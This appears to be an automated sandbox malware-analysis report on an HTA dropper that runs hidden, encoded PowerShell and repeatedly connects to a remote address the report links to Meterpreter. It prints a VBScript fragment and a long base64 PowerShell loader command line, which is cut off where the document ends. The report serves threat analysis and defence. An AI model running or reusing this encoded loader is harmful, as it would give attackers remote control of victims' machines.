          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: amsi32_4800.amsi.csv, type: OTHER
          Source: Yara matchFile source: 00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2284451182.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4800, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          11
          Process Injection
          21
          Virtualization/Sandbox Evasion
          OS Credential Dumping1
          Security Software Discovery
          Remote Services1
          Email Collection
          1
          Non-Standard Port
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          PowerShell
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          11
          Process Injection
          LSASS Memory1
          Process Discovery
          Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
          Deobfuscate/Decode Files or Information
          Security Account Manager21
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Obfuscated Files or Information
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Software Packing
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials12
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          na.hta63%ReversingLabsScript-WScript.Dropper.PSRunner
          na.hta100%AviraVBS/PSRunner.VPA
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://crl.micro0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://aka.ms/pscore6lB0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          No contacted domains info
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2185051955.0000000005A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://crl.micropowershell.exe, 00000001.00000002.2187985444.00000000071F0000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2181031208.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004AC1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2181031208.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004AC1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            https://go.micropowershell.exe, 00000001.00000002.2181031208.0000000005234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004D70000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              https://contoso.com/powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2185051955.0000000005A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/Licensepowershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/Iconpowershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              86.104.74.31
              unknownRomania
              50636TELE-ROM-ASstrAleeaPaciiBlB5Ap16ROtrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1534778
              Start date and time:2024-10-16 08:09:14 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 34s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:na.hta
              Detection:MAL
              Classification:mal100.troj.evad.winHTA@7/5@0/1
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 95%
              • Number of executed functions: 16
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .hta
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target powershell.exe, PID 4800 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 4828 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: na.hta
              TimeTypeDescription
              02:10:10API Interceptor44x Sleep call for process: powershell.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              86.104.74.31v65EwoFOxj.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                TELE-ROM-ASstrAleeaPaciiBlB5Ap16ROg4nWvGoRNZ.exeGet hashmaliciousRemcosBrowse
                • 86.104.72.183
                5046511eb489387b7a835a990ea3b36b77185f3fad905511c4bce30aa654c60b_dump.exeGet hashmaliciousRemcosBrowse
                • 86.104.72.183
                aqB7l6kvXl.exeGet hashmaliciousRemcosBrowse
                • 86.104.72.183
                https://libidotechnexus.com/cdn-vs/cache.phpGet hashmaliciousUnknownBrowse
                • 86.104.72.5
                v65EwoFOxj.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                • 86.104.74.31
                HQuxVxuLV.ps1Get hashmaliciousNetSupport RATBrowse
                • 86.104.72.157
                http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                • 86.104.72.157
                https://webex-install.comGet hashmaliciousNetSupport RATBrowse
                • 86.104.72.157
                6LBI8wV2LuGet hashmaliciousMiraiBrowse
                • 86.104.79.239
                No context
                No context
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1510207563435464
                Encrypted:false
                SSDEEP:3:NlllulPki/llllZ:NllUcylll
                MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:@...e.................................^..............@..........
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                File type:HTML document, ASCII text, with very long lines (7091)
                Entropy (8bit):4.622763878457413
                TrID:
                  File name:na.hta
                  File size:7'458 bytes
                  MD5:80d63e57cf21fda8b8c90e474eb46a4a
                  SHA1:ca838f1b1972ceefbeda106c0f201a87d3d8a5c9
                  SHA256:23d30acfa7336b1bcd1a62a2225f1ad2c2f82f683cf70041874bb9ecfad9dfec
                  SHA512:0d4d22b487abccc240a88d88246467fac195ff212ce8dd73a00d93de78bf96e49857e6ae59cc4d546197086ad5aae0500f6fa624399cb4b8884824a9bdd8b068
                  SSDEEP:192:Jn2jh1hqT2jzl46T6erUllgkQaoXIUF6hd9d:Jn2jh1hskrT6erUlikQa3hd9d
                  TLSH:99F1F167CA30BCD847AD3280A7A11C5E21E9555783778A70C7091CF63E96782FF6A6CC
                  File Content Preview:<script language="VBScript">. window.moveTo -4000, -4000. Set oYF_mILKkDd = CreateObject("Wscript.Shell"). Set aFEZ = CreateObject("Scripting.FileSystemObject"). For each path in Split(oYF_mILKkDd.ExpandEnvironmentStrings("%PSModulePath%"),";"). If
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 16, 2024 08:10:13.258691072 CEST497111911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:13.263511896 CEST19114971186.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:13.263588905 CEST497111911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:13.858697891 CEST19114971186.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:13.858797073 CEST497111911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:13.860272884 CEST497111911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:13.863135099 CEST497131911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:13.865102053 CEST19114971186.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:13.868100882 CEST19114971386.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:13.868204117 CEST497131911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:14.465310097 CEST19114971386.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:14.465420008 CEST497131911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:14.467060089 CEST497131911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:14.469630957 CEST497141911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:14.471960068 CEST19114971386.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:14.474630117 CEST19114971486.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:14.474761963 CEST497141911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:15.073081017 CEST19114971486.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:15.073190928 CEST497141911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:15.074325085 CEST497141911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:15.076158047 CEST497201911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:15.079188108 CEST19114971486.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:15.081073046 CEST19114972086.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:15.081166983 CEST497201911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:15.682550907 CEST19114972086.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:15.682670116 CEST497201911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:15.684020996 CEST497201911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:15.686295986 CEST497211911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:15.688818932 CEST19114972086.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:15.691174030 CEST19114972186.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:15.691343069 CEST497211911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:16.291723013 CEST19114972186.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:16.291863918 CEST497211911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:16.293303967 CEST497211911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:16.296005011 CEST497271911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:16.298129082 CEST19114972186.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:16.300884008 CEST19114972786.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:16.300971985 CEST497271911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:16.895020962 CEST19114972786.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:16.895086050 CEST497271911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:16.896285057 CEST497271911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:16.898785114 CEST497301911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:16.901093006 CEST19114972786.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:16.903599024 CEST19114973086.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:16.903672934 CEST497301911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:17.494992971 CEST19114973086.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:17.495215893 CEST497301911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:17.496579885 CEST497301911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:17.499185085 CEST497341911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:17.501430035 CEST19114973086.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:17.504084110 CEST19114973486.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:17.504174948 CEST497341911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:18.108690977 CEST19114973486.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:18.108767033 CEST497341911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:18.109766006 CEST497341911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:18.111620903 CEST497401911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:18.114543915 CEST19114973486.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:18.116477013 CEST19114974086.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:18.116555929 CEST497401911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:18.708895922 CEST19114974086.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:18.709088087 CEST497401911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:18.710084915 CEST497401911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:18.712045908 CEST497421911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:18.714852095 CEST19114974086.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:18.716991901 CEST19114974286.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:18.717078924 CEST497421911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:19.311779976 CEST19114974286.104.74.31192.168.2.6
                  Oct 16, 2024 08:10:19.311868906 CEST497421911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:19.312839031 CEST497421911192.168.2.686.104.74.31
                  Oct 16, 2024 08:10:19.317789078 CEST19114974286.104.74.31192.168.2.6

                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:02:10:09
                  Start date:16/10/2024
                  Path:C:\Windows\SysWOW64\mshta.exe
                  Wow64 process (32bit):true
                  Commandline:mshta.exe "C:\Users\user\Desktop\na.hta"
                  Imagebase:0x3c0000
                  File size:13'312 bytes
                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:1
                  Start time:02:10:09
                  Start date:16/10/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB9ADQAMABMAFgAVwBsAFAAawBrAFEAUgA2AEUATQB3AFcAdgBJAE4ATAA2AGMAMgBkADIARQBkAFAAVQBiAHUAeQBRAEMASwBEAGIAegBZAEcAaQBwAFEAVwAnACcAKwAnACcAawBCAGkAbQBrADgAewAxAH0AVABZAEYAcQBmAEwATwBRAGkAcABOAHMATgBwAFcAbABiADYAYQA4AHsAMgB9AE4AcgA2AHkANABCAEQAUABpAGwAeABVAFUAcAB6AFQAZgBRAG0AdgBCAHMANgBIADYANgBLADYAegBaAG8ASgA2AE8AJwAnACsAJwAnAEIAVwBGAHUAYgBuACsATAB6AGoAegBZADIAMABlAHAAeQBKAFoAZQB4AEIAVQBnAE8ARABTAFgAUgBHAFAAWQBpAFkAUgBLAFMAcwBkADYAewAyAH0ATgByADYAOQBLAGcATwBGADUAOQAnACcAKwAnACcARgBRADgAYgBNAHcAWgBKAEEANQBaAHUASQBSADYAdwBJAG4ARgB3AHsAMgB9AGEAUgBLAEEAcAA0AEMATABmAFMASwBTADAAUQB7ADEAfQBXAGoARQBTAGcAVQBSAFcASwBWAG8ATQBCADEAQQBYADgAcwBUAEkAbQBJAFUAJwAnACsAJwAnAEQANABxAHQAdgB1AEYAbABrAHcASQA3AHUARQBwAGMAQwBrAEMAZABPAFEAcgBCAGQAeABrAFYAWgBHAGQARgBFAFEATgAyAFIARwBPAFAAVAAvACsASABCAHkAMgBxAFQAdQBXAEkAbgBKAEEAKwBNAFYAbQBUAFcAegBOAG8ASwBTAGYANwBTADkAYwBYAG4AVABWAHQAJwAnACsAJwAnAFMATgBNAGMAbgBRAHkATQBSAGcARQBRAHIANABaAEcARgBVADcATABmADIAQgBVAFgANwBhAE4AeABUAHYAcwBJAHYAawBrAHsAMQB9AFoAbwA1AC8AcwBxAFQAVgA3AGcAWgArAEQAdgB5AEcAegBRAFAALwA5AE8AUwA2AFkAOQBCADYAbAB6AHUAZQBuAGYAYgBiAHIAUwArAEkAYgBvAEsATgA5ADYAVwBIAFAAUAAvAEUASgA0AGYAdQBxAEMASABjADQANgA2AHcAKwA2AGcAegBvAEsAYgBWAEMARAB7ADEAfQAnACcAKwAnACcATAB2AEoAVABqAGEAewAyAH0AQgBRAE0AN